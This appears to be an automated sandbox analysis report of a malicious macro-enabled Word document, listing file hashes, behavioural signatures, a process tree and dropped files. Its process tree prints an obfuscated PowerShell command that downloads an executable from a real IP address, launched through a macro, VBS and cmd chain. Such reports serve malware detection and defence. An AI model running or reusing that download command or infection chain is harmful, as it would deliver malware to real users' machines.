Analysis
-
max time kernel
129s -
max time network
173s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 12:14
Static task
static1
Behavioral task
behavioral1
Sample
TTP-US-246841413.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
TTP-US-246841413.docm
Resource
win10v2004-20220414-en
General
-
Target
TTP-US-246841413.docm
-
Size
93KB
-
MD5
674d7910c1ee176de0e24fd0179d83ab
-
SHA1
ff11c4281f065fa38d91e606a5e294d7fd8e312d
-
SHA256
567b7fe91330078fd3ba9e0f152203bb4e8edf5af0d43dd09deb7273cff24b39
-
SHA512
3825964d5a19453885e521c8e79cfc086b253bbbef34467abf94bc7044cb3c89409bcdae1313ba01ab109a60961abaa960a41e3d963f45531d377186994a94b6
Malware Config
Extracted
http://62.108.35.26/generator.php
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
explorer.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3632 2324 explorer.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 39 1760 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3112 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2324 WINWORD.EXE 2324 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1760 powershell.exe 1760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1760 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 2324 WINWORD.EXE 2324 WINWORD.EXE 2324 WINWORD.EXE 2324 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEexplorer.exeWScript.execmd.exedescription pid process target process PID 2324 wrote to memory of 3632 2324 WINWORD.EXE explorer.exe PID 2324 wrote to memory of 3632 2324 WINWORD.EXE explorer.exe PID 1800 wrote to memory of 1604 1800 explorer.exe WScript.exe PID 1800 wrote to memory of 1604 1800 explorer.exe WScript.exe PID 1604 wrote to memory of 2652 1604 WScript.exe cmd.exe PID 1604 wrote to memory of 2652 1604 WScript.exe cmd.exe PID 2652 wrote to memory of 1760 2652 cmd.exe powershell.exe PID 2652 wrote to memory of 1760 2652 cmd.exe powershell.exe PID 2652 wrote to memory of 3112 2652 cmd.exe timeout.exe PID 2652 wrote to memory of 3112 2652 cmd.exe timeout.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\TTP-US-246841413.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs2⤵
- Process spawned unexpected child process
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.26/generator.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exeTIMEOUT /T 104⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\AsusSupport\KreuitrsfYRgryFVFt5.cmdFilesize
21KB
MD5408f33dd378d96e4ccd439f05370c3e9
SHA11da9b505753f4c3c9b7d175e181f383317455256
SHA256193f23ad0bd0e9076fd0370f89bed6f48d7f72fa34b40679fcde1c5d2bc88227
SHA512f1b3db9cef3e949067a56af8626d7422900d153277a9824ab64a471411092fcc2b44e79326e4e4446938875e769da170ef5b37618f820b0b96b9d522d4140337
-
C:\ProgramData\OIUTFuyFilesize
4KB
MD5f68f78d0cdd0be34785eba37ae4787d3
SHA1fdc6a82309b966af80d03db8557a98f50ed57bcf
SHA256e2eb68d537314b4fceb6aeee6737102387e85cb0d5c06e4e8a3881dabbfef2d4
SHA5122de718f4e079674db9bc1b0f67a43f28941623f0d8c1246120feefe372e7d9b2608fe78e223eff8c6d75731763fd66d29ecec1ee158c7430cefc6723e84d9cbd
-
C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbsFilesize
89KB
MD5cbda7ec492b04a9a0258ad89779fd397
SHA13e8e0c1a59019994beaa1f5362034c3e3580a0ef
SHA25621d108ef69fe0403a46c053c72e9a5b93a11d42cb2f1c098c6be762cfdda5f7e
SHA51200f10131f1065c0b4b7df6f9ca2b20b2835c2e478d1116d7bc29a6d16bf8f6191055ab7da0572de32aadd111bf69958d6ffea1046c723c47cf53ab8127807d7e
-
memory/1604-140-0x0000000000000000-mapping.dmp
-
memory/1760-146-0x00007FF8E5710000-0x00007FF8E61D1000-memory.dmpFilesize
10.8MB
-
memory/1760-145-0x00000254F3530000-0x00000254F3552000-memory.dmpFilesize
136KB
-
memory/1760-144-0x0000000000000000-mapping.dmp
-
memory/2324-134-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/2324-137-0x000001C3EC190000-0x000001C3EC194000-memory.dmpFilesize
16KB
-
memory/2324-136-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmpFilesize
64KB
-
memory/2324-135-0x00007FF8CDFC0000-0x00007FF8CDFD0000-memory.dmpFilesize
64KB
-
memory/2324-130-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/2324-133-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/2324-132-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/2324-131-0x00007FF8D0890000-0x00007FF8D08A0000-memory.dmpFilesize
64KB
-
memory/2652-142-0x0000000000000000-mapping.dmp
-
memory/3112-147-0x0000000000000000-mapping.dmp
-
memory/3632-138-0x0000000000000000-mapping.dmp